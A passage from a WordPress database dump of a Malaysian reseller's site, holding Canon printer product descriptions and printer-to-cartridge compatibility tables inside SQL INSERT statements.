width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-25 08:58:32','2019-09-25 00:58:32','',1449,'https://bintara.com.my/blog/2019/09/25/1449-revision-v1/',0,'revision','',0);
INSERT INTO `wpdp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (2784,1,'2019-01-03 15:19:59','2019-01-03 07:19:59','<h3>Injet Printers :-</h3>\r\n<h4>PIXMA E560 / E560R</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" sizes=\"(max-width: 362px) 100vw, 362px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nAdvanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing\r\n\r\nThe Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.\r\n\r\nAvailable in Black and Red.\r\n\r\nPrint, Scan, Copy\r\n\r\nISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour\r\n\r\nHi-speed USB 2.0, WiFi\r\n\r\nRecommended print volume: 80 - 400 pages\r\n\r\n[maxbutton id=\"11\" ]\r\n<h4>PIXMA E4270</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" sizes=\"(max-width: 362px) 100vw, 362px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nCompact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing\r\n\r\nThis compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.\r\n\r\nPrint, Scan, Copy, Fax\r\n\r\nISO standard print speed (A4): 8.8ipm black / 4.4ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct\r\n\r\nRecommended print volume: 50 - 200 pages\r\n\r\n[maxbutton id=\"11\" ]\r\n<h4>PIXMA TS9570</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" sizes=\"(max-width: 362px) 100vw, 362px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nA3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder\r\n\r\nThis A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.\r\n\r\nPrint, Scan, Copy\r\n\r\nISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct\r\n\r\nRecommended print volume: 80 - 300 pages\r\n\r\n[maxbutton id=\"11\" ]\r\n<h4>PIXMA TS8270</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" sizes=\"(max-width: 362px) 100vw, 362px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nWireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing\r\n\r\nThis advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.\r\n\r\nAvailable in Black, Red and White.\r\n\r\nPrint, Scan, Copy\r\n\r\nISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct\r\n\r\nRecommended print volume: 30 - 100 pages\r\n\r\n[maxbutton id=\"11\" ]\r\n<h4>PIXMA G2010</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" sizes=\"(max-width: 362px) 100vw, 362px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nRefillable Ink Tank All-In-One for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost\r\n\r\nPrint, Scan &amp; Copy\r\n\r\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\r\n\r\nHi-speed USB 2.0\r\n\r\nRecommended print volume: 150 - 1500 pages\r\n\r\n[maxbutton id=\"11\" ]\r\n<h4>PIXMA G4010</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" sizes=\"(max-width: 362px) 100vw, 362px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nRefillable Ink Tank All-In-One for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost.\r\n\r\nPrint, Scan, Copy and Fax\r\n\r\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode\r\n\r\nRecommended print volume: 150 - 1500 pages\r\n\r\n[maxbutton id=\"11\" ]\r\n<h4>PIXMA G1010</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" sizes=\"(max-width: 362px) 100vw, 362px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nRefillable Ink Tank Printer for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost\r\n\r\nPrint\r\n\r\nISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)\r\n\r\nPhoto Speed (4 x 6\"): 60sec. (borderless)\r\n\r\n[maxbutton id=\"11\" ]\r\n<h4>PIXMA G3010</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" sizes=\"(max-width: 362px) 100vw, 362px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nRefillable Ink Tank Wireless All-In-One for High Volume Printing\r\n\r\nDesigned for high volume printing at low running cost\r\n\r\nPrint, Scan &amp; Copy\r\n\r\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\r\n\r\nHi-speed USB 2.0, WiFi, Mopria, Access Point Mode\r\n\r\nRecommended print volume: 150 - 1500 pages\r\n\r\n[maxbutton id=\"11\" ]\r\n<h3>Laser Printers :-</h3>\r\n<h4>imageCLASS LBP113w</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" sizes=\"(max-width: 362px) 100vw, 362px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" alt=\"\" width=\"362\" height=\"320\" />\r\n<h4>Compact with wireless connectivity</h4>\r\nSimple to operate and compact in size, the ideal choice for your printing needs.\r\n<ul>\r\n 	<li>Print</li>\r\n 	<li>Print Speed (A4): Up to 22ppm</li>\r\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\r\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\r\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\r\n 	<li>Mobile Connectivity.</li>\r\n</ul>\r\n[maxbutton id=\"11\" ]\r\n<h4>imageCLASS MF269dw</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" sizes=\"(max-width: 362px) 100vw, 362px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\n<strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong>\r\n\r\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\r\n<ul>\r\n 	<li>Print, Scan, Copy, Fax</li>\r\n 	<li>Print Speed (A4): Up to 28ppm</li>\r\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\r\n 	<li>FPOT: Approx. 5.2 sec</li>\r\n 	<li>Max. paper input capacity: 251 sheets</li>\r\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\r\n</ul>\r\n[maxbutton id=\"11\" ]\r\n<h4>imageCLASS MF266dn</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" sizes=\"(max-width: 362px) 100vw, 362px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\n<strong>The Multifunction printing solution with Mobile Printing and Network</strong>\r\n\r\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\r\n<ul>\r\n 	<li>Print, Scan, Copy, Fax</li>\r\n 	<li>Print Speed (A4): Up to 28ppm</li>\r\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\r\n 	<li>FPOT: Approx. 5.2 sec</li>\r\n 	<li>Max. paper input capacity: 251 sheets</li>\r\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\r\n</ul>\r\n[maxbutton id=\"11\" ]\r\n<h4>imageCLASS MF913w</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" sizes=\"(max-width: 362px) 100vw, 362px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\n<strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong>\r\n\r\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\r\n<ul>\r\n 	<li>Print, Scan, Copy</li>\r\n 	<li>Print Speed (A4): Up to 22ppm</li>\r\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\r\n 	<li>FPOT: Approx. 6.5 sec</li>\r\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\r\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\r\n</ul>\r\n[maxbutton id=\"11\" ]\r\n<h4>imageCLASS MF113w</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" sizes=\"(max-width: 362px) 100vw, 362px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\n<strong>Compact All-in-One with wireless connectivity</strong>\r\n\r\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\r\n<ul>\r\n 	<li>Print, Scan, Copy</li>\r\n 	<li>Print Speed (A4): Up to 22ppm</li>\r\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\r\n 	<li>FPOT: Approx. 6.5 sec</li>\r\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\r\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\r\n</ul>\r\n[maxbutton id=\"11\" ]\r\n<h4>imageCLASS LBP913w</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" sizes=\"(max-width: 362px) 100vw, 362px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\n<strong>Compact with wireless connectivity, bundled with 3 cartridges</strong>\r\n\r\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\r\n<ul>\r\n 	<li>Print</li>\r\n 	<li>Print Speed (A4): Up to 22ppm</li>\r\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\r\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\r\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\r\n 	<li>Mobile Printing</li>\r\n</ul>\r\n[maxbutton id=\"11\" ]\r\n<h4>imageCLASS MF525x</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" sizes=\"(max-width: 362px) 100vw, 362px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\r\n<ul>\r\n 	<li>Print, Scan, Copy, Fax</li>\r\n 	<li>Print Speed (A4): Up to 43ppm</li>\r\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\r\n 	<li>FPOT: 6.2secs. (A4)</li>\r\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\r\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\r\n</ul>\r\n[maxbutton id=\"11\" ]\r\n<h4>imageCLASS MF426dw</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" sizes=\"(max-width: 362px) 100vw, 362px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" alt=\"\" width=\"362\" height=\"320\" />\r\n\r\n<strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong>\r\n\r\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\r\n<ul>\r\n 	<li>Print, Scan, Copy, Fax</li>\r\n 	<li>Print Speed (A4): Up to 38ppm</li>\r\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\r\n 	<li>FPOT: 5.5secs. (A4)</li>\r\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\r\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\r\n</ul>\r\n[maxbutton id=\"11\" ]\r\n<h3>Cartridge Printers :-</h3>\r\n<table width=\"378\">\r\n<tbody>\r\n<tr>\r\n<td width=\"170\"><strong>Model</strong></td>\r\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">imagePROGRAF PRO-500</td>\r\n<td width=\"208\">Maintenance Cartridge MC-20</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PFI-50 (Blue)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PFI-50 (Chroma Optimizer)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PFI-50 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PFI-50 (Gray)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PFI-50 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PFI-50 (Matte Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PFI-50 (Photo Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PFI-50 (Photo Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PFI-50 (Photo Gray)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PFI-50 (Photo Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PFI-50 (Red)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PFI-50 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">MAXIFY iB4170</td>\r\n<td width=\"208\">PGI-2700 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">MAXIFY MB5070</td>\r\n<td width=\"208\">PGI-2700 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">MAXIFY MB5170</td>\r\n<td width=\"208\">PGI-2700 (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700 (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700 (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700 (Yellow)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL (Black)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL (Cyan)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL (Magenta)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"></td>\r\n<td width=\"208\">PGI-2700XL 